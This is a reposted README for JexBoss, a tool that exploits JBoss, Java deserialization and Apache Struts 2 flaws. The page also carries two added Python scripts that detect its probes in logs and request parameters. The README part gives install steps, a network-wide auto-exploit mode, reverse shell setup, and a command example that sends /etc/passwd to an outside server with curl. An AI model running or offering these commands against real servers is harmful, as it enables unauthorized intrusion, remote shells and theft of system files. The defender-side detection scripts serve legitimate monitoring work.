JexBoss – JBoss Verification and Exploitation Tool
- Server
- 2023-01-28
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and in other Java platforms, frameworks, applications, etc.
Requirements
Python >= 2.7.x
urllib3
ipaddress
Installation on Linux / Mac
To install the latest version of JexBoss, use the following commands:
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
OR:
Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
If you are using CentOS with Python 2.6, install Python 2.7. Example of installing Python 2.7 on CentOS using Software Collections (scl):
yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash
Installation on Windows
If you are using Windows, you can use Git Bash to run JexBoss. Follow these steps:
Download and install Python
Download and install Git for Windows
After installation, run Git for Windows and type the following commands:
PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080
Features
The tool and the exploits were developed and tested on:
JBoss Application Server versions 3, 4, 5 and 6. Multiple Java frameworks, platforms and applications (e.g. Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc.). The exploitation vectors include:
/admin-console: tested and working in JBoss versions 5 and 6
/jmx-console: tested and working in JBoss versions 4, 5 and 6
/web-console/Invoker: tested and working in JBoss versions 4, 5 and 6
/invoker/JMXInvokerServlet: tested and working in JBoss versions 4, 5 and 6
Application deserialization: tested and working on multiple Java applications, platforms, etc., via HTTP POST parameters
Servlet deserialization: tested and working on multiple Java applications, platforms, etc., via servlets that handle serialized objects (e.g. when you see "Invoker" in a link)
Apache Struts 2 CVE-2017-5638: tested on Apache Struts 2 applications
Others
Usage
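The vector paths listed above are also what a JexBoss scan leaves behind in a web server's access log, which makes them a cheap detection signal. The script below is an added, defender-side example and is not part of JexBoss or its README: it parses constructed Combined-Log-Format lines (the regular expression is an assumption about the log layout), flags every request whose path starts with one of the listed vectors, and reports per client which of those vectors answered with something other than 404, because a non-404 on /jmx-console or /invoker/JMXInvokerServlet means the console or invoker is actually reachable, not merely being guessed at.

```python
"""Flag requests to the JBoss exploitation vectors listed above in web-server
access logs.  Added defender-side example; the log lines are constructed."""
import re
from collections import defaultdict

# Vector paths from the feature list above, matched as case-insensitive prefixes.
JEXBOSS_VECTOR_PATHS = (
    "/admin-console",
    "/jmx-console",
    "/web-console/Invoker",
    "/invoker/JMXInvokerServlet",
)

# Assumed Combined Log Format: client, ident, user, [time], "METHOD path proto", status, bytes.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict with client/time/method/path/status, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def matched_vector(path):
    """Return the vector path this request touches, or None."""
    lowered = path.lower()
    for vector in JEXBOSS_VECTOR_PATHS:
        if lowered.startswith(vector.lower()):
            return vector
    return None


def find_probes(lines):
    """Group vector requests by client: {client: [(path, vector, status), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        vector = matched_vector(rec["path"])
        if vector is not None:
            hits[rec["client"]].append((rec["path"], vector, rec["status"]))
    return dict(hits)


def summarize(hits):
    """One line per client: vectors probed, and which ones did not answer 404."""
    out = []
    for client, reqs in sorted(hits.items()):
        vectors = sorted({v for _, v, _ in reqs})
        reachable = sorted({v for _, v, s in reqs if s != 404})
        out.append("%s probed %d vector(s): %s; answered non-404: %s"
                   % (client, len(vectors), ", ".join(vectors), ", ".join(reachable) or "none"))
    return out


# Constructed sample log: one client sweeping all four vectors, one ordinary client
# plus a single mixed-case probe.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Jan/2023:10:00:01 +0000] "GET /jmx-console/ HTTP/1.1" 200 1234',
    '10.0.0.5 - - [28/Jan/2023:10:00:02 +0000] "HEAD /web-console/Invoker HTTP/1.1" 404 0',
    '10.0.0.5 - - [28/Jan/2023:10:00:02 +0000] "POST /invoker/JMXInvokerServlet HTTP/1.1" 500 0',
    '10.0.0.5 - - [28/Jan/2023:10:00:03 +0000] "GET /admin-console/ HTTP/1.1" 302 0',
    '10.0.0.9 - - [28/Jan/2023:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '10.0.0.9 - - [28/Jan/2023:10:00:06 +0000] "GET /JMX-Console/HtmlAdaptor HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for line in summarize(find_probes(SAMPLE_LOG)):
        print(line)
```

Prefix matching rather than exact matching is deliberate: the consoles are reached through sub-paths such as /jmx-console/HtmlAdaptor, and case folding catches the mixed-case variants that a simple string filter would miss. A client that touches several vectors inside a few seconds is the scan pattern; a vector that answers 200, 302 or 500 is the one to investigate first.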
Simple usage example:
$ python jexboss.py
Standalone mode example against JBoss:
$ python jexboss.py -u http://192.168.0.26:8080
Usage / help:
$ python jexboss.py -h
Network scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt
Network scan with auto-exploit mode:
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt
Reverse shell (Meterpreter integration)
After exploiting a JBoss server, you can use JexBoss's own command shell or perform a reverse connection with the following command:
jexremote=YOUR_IP:YOUR_PORT
Example:
Shell>jexremote=192.168.0.10:4444
When exploiting Java deserialization vulnerabilities (Application deserialization, Servlet deserialization), the default options are: establish a reverse shell connection, or send a command to be executed.
Usage examples
For a Java deserialization vulnerability in a custom HTTP parameter, sending a custom command to be executed on the exploited server:
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd curl -d@/etc/passwd http://your_server
For a Java deserialization vulnerability in a custom HTTP parameter, creating a reverse shell (this will ask for the IP address and port of the remote host):
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
For a Java deserialization vulnerability in a Servlet (such as Invoker):
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
For Apache Struts 2 (CVE-2017-5638):
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
For Apache Struts 2 (CVE-2017-5638), with cookies for authenticated resources:
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
Auto scan mode:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
File scan mode:
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
More options:
optional arguments:
  -h, --help            show this help message and exit
  --version             show programs version number and exit
  --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)
  --disable-check-updates, -D
                        Disable two updates checks: 1) Check for updates performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt
  -mode {standalone,auto-scan,file-scan}
                        Operation mode (DEFAULT: standalone)
  --app-unserialize, -j
                        Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, oldFormData, etc)
  --servlet-unserialize, -l
                        Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces)
  --jboss               Check only for JBOSS vectors.
  --jenkins             Check only for Jenkins CLI vector.
  --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be checked by default.
  --proxy PROXY, -P PROXY
                        Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128)
  --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                        Proxy authentication credentials (eg -L name:password)
  --jboss-login LOGIN:PASS, -J LOGIN:PASS
                        JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 (default: admin:admin)
  --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)

Standalone mode:
  -host HOST, -u HOST   Host address to be checked (eg. -u http://192.168.0.10:8080)

Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
  --reverse-host RHOST:RPORT, -r RHOST:RPORT
                        Remote host address and port for reverse shell when exploiting Java Deserialization Vulnerabilities in application layer (for now, working only against *nix systems)(eg. 192.168.0.10:1331)
  --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server)
  --windows, -w         Specifies that the commands are for rWINDOWS System$ (cmd.exe)
  --post-parameter PARAMETER, -H PARAMETER
                        Specify the parameter to find and inject serialized objects into it. (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState)
  --show-payload, -t    Print the generated payload.
  --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                        Specify the type of Gadget to generate the payload automatically. (DEFAULT: commons-collections3.1 or groovy1 for JenKins)
  --load-gadget FILENAME
                        Provide your own gadget from file (a java serialized object in RAW mode)
  --force, -F           Force send java serialized gadgets to URL informed in -u parameter. This will send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with different Content-Types.

Auto scan mode:
  -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
  -ports PORTS          List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443)
  -results FILENAME     File name to store the auto scan results

File scan mode:
  -file FILENAME_HOSTS  Filename with host list to be scanned (one host per line)
  -out FILENAME_RESULTS
                        File name to store the file scan results
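The --post-parameter, --gadget and --force options above describe what an application-layer deserialization probe looks like on the wire: a Java serialized object placed in javax.faces.ViewState (or a similar parameter), sent raw, gzipped or base64-encoded, and built from commons-collections or Groovy gadget classes. The following is an added, defender-side example, not JexBoss code, written for Python 3 (the tool itself targets Python 2.7): it peels base64 and gzip layers off a parameter value, checks for the standard Java object-stream header 0xACED0005, and reports whether the package names of the gadget libraries named by --gadget appear in the stream. The sample parameter values are constructed stand-ins, not real gadget chains.

```python
"""Classify an HTTP parameter value as a (possibly wrapped) Java serialized
object.  Added defender-side example; sample values below are constructed."""
import base64
import binascii
import gzip
import zlib

# java.io.ObjectStreamConstants: STREAM_MAGIC (0xACED) followed by STREAM_VERSION (5).
STREAM_MAGIC = b"\xac\xed\x00\x05"
GZIP_MAGIC = b"\x1f\x8b"

# Package prefixes of the gadget libraries listed under --gadget.  Class names are
# stored as plain UTF strings inside a serialization stream, so a substring match
# on the decoded payload is a usable first-pass indicator.
GADGET_HINTS = (
    b"org.apache.commons.collections",   # covers commons-collections 3.x and collections4
    b"org.codehaus.groovy",              # groovy1 gadget
)


def unwrap_layers(data, max_depth=4):
    """Peel gzip and base64 wrappers off `data` (bytes) until the stream header
    is reached or nothing more decodes.  Returns (payload, layers_removed)."""
    data = data.strip()
    layers = []
    for _ in range(max_depth):
        if data.startswith(STREAM_MAGIC):
            break
        if data.startswith(GZIP_MAGIC):
            try:
                data = gzip.decompress(data)
            except (OSError, EOFError, zlib.error):
                break
            layers.append("gzip")
            continue
        try:
            decoded = base64.b64decode(data, validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded:
            break
        data = decoded
        layers.append("base64")
    return data, layers


def classify_parameter(value):
    """Classify one form-decoded parameter value (bytes).  'serialized' is True when
    a Java object stream was found; 'gadget_hints' lists matching library packages."""
    payload, layers = unwrap_layers(value)
    serialized = payload.startswith(STREAM_MAGIC)
    hints = [h.decode() for h in GADGET_HINTS if serialized and h in payload]
    return {"serialized": serialized, "layers": layers,
            "gadget_hints": hints, "size": len(payload)}


# Constructed samples.  FAKE_STREAM only mimics the header and a class descriptor
# (TC_OBJECT 0x73, TC_CLASSDESC 0x72, length-prefixed name); it is not a gadget chain.
_CLASS = b"org.apache.commons.collections.map.LazyMap"
FAKE_STREAM = STREAM_MAGIC + b"\x73\x72" + len(_CLASS).to_bytes(2, "big") + _CLASS + b"\x00" * 16
SAMPLE_RAW = FAKE_STREAM
SAMPLE_BASE64 = base64.b64encode(FAKE_STREAM)
SAMPLE_BASE64_GZIP = base64.b64encode(gzip.compress(FAKE_STREAM))
SAMPLE_SERVER_SIDE_VIEWSTATE = b"-1234567890123:9876543210987"   # benign JSF server-side state id
SAMPLE_BASE64_TEXT = base64.b64encode(b"just a normal form field")

if __name__ == "__main__":
    for name, value in [("raw", SAMPLE_RAW), ("base64", SAMPLE_BASE64),
                        ("base64+gzip", SAMPLE_BASE64_GZIP),
                        ("server-side ViewState", SAMPLE_SERVER_SIDE_VIEWSTATE),
                        ("base64 text", SAMPLE_BASE64_TEXT)]:
        print("%-22s %s" % (name, classify_parameter(value)))
```

Feed it the form-decoded parameter bytes, not the raw URL-encoded string, or the base64 layer will fail to validate. A JSF application configured for client-side state saving legitimately sends a serialized (usually encrypted) ViewState, so the stream header alone is not proof of an attack; the gadget-package hints, together with the request path and the client's other activity, are what justify an alert. The same unwrapping is what makes the --force multi-format behaviour visible to a WAF or log pipeline that would otherwise only inspect raw bodies.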